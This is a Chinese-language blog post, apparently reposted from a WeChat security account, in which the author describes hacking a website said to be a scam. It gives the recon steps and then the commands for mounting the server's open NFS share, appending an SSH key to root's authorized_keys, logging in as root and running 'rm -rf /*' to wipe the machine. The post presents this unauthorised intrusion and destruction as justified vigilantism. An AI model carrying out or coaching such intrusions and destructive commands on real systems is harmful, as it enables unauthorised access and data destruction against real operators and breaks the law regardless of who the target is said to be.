前言:
我:大佬你过年不休息一下吗?这么卷。
某大佬:休息啥,放假回家练练技术躺床上挖挖src很轻松还有钱拿,搞安全的貌似没休息的。
我:.............
------------------------------------
前几天和几个小伙伴在群里聊天的时候,有个人发了一个链接,说是一个诈骗网点,小伙伴还被网点骗了2.6块钱。
然后我打开网站看了看,随后就和小伙伴们决定试试看能不能端了。(本人网络安全新手纯小白文章有不足的各位大佬亲喷)
-
确定目标/信息收集
打开小伙伴发的网站后先是对网站各个界面做了浏览,了解了一下基础功能啥的。
![菜狗对诈骗网站的一次渗透--(flower安全日志)]( "菜狗对诈骗网站的一次渗透--(flower安全日志)")
网站整体界面做的比较简洁,没有大家经常看的黄站的那种闪来闪去的广告啥的,估计也是模板建站的因为类似的我好像之前也见过但是记不起是在哪里见过了........................
浏览完整体界面后去做下资产收集啥的,fofa先来
![菜狗对诈骗网站的一次渗透--(flower安全日志)]( "菜狗对诈骗网站的一次渗透--(flower安全日志)")
nginx的,其它有用的啥也是没搜到因为fofa没会员...,然后再去其它引擎也搜搜最后在综合搜一下whois啥的
![菜狗对诈骗网站的一次渗透--(flower安全日志)]( "菜狗对诈骗网站的一次渗透--(flower安全日志)")
用dirsearch扫了扫扫到一堆东西
![菜狗对诈骗网站的一次渗透--(flower安全日志)]( "菜狗对诈骗网站的一次渗透--(flower安全日志)")
基本的都差不多了但是后台没找到继续找下后台
![菜狗对诈骗网站的一次渗透--(flower安全日志)]( "菜狗对诈骗网站的一次渗透--(flower安全日志)")
扫到一堆端口.......
结果发现了这个
开了nfs还同时有22端口ssh复现nfs漏洞试试
因为nfs命令不是很熟悉所以参考了一下TeamsSix大佬写的nfs指令
nfs漏洞简单来说就是把我的ssh公钥传到他那里然后再用公钥链接ssh
下载和配置nfs服务
apt-get install nfs-comm 连接目标服务器这边用nslookup解析出了真实IP
连接一下nfs
showmount -e xxx.xx.x.xmkdir /tmp/xxx.xx.x.xmount -t nfs xxx.xx.x.x:/ /tmp/xxx.xx.x.x/cd /tmp/xxx.xx.x.x/
创建公钥发送过去
ssh-keygencat .ssh/id_sa.pub >> /tmp/xxx.xx.x.x/root/.ssh/authorized_keys
windows或者kali连接都行,我这边使用kali连接下。
ssh root@xxx.xx.x.x连接上目标就可以随便玩了,因为是诈骗网点直接执行rm -rf/*就行
这就是一个诈骗网点简单的渗透..渗透过程不是很复杂完全是因为搞诈骗的把心思用在诈骗上了没有注重安全
------------------------------结束------------------------------
原文始发于微信公众号(WK安全):菜狗对诈骗网站的一次渗透--(flower安全日志)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论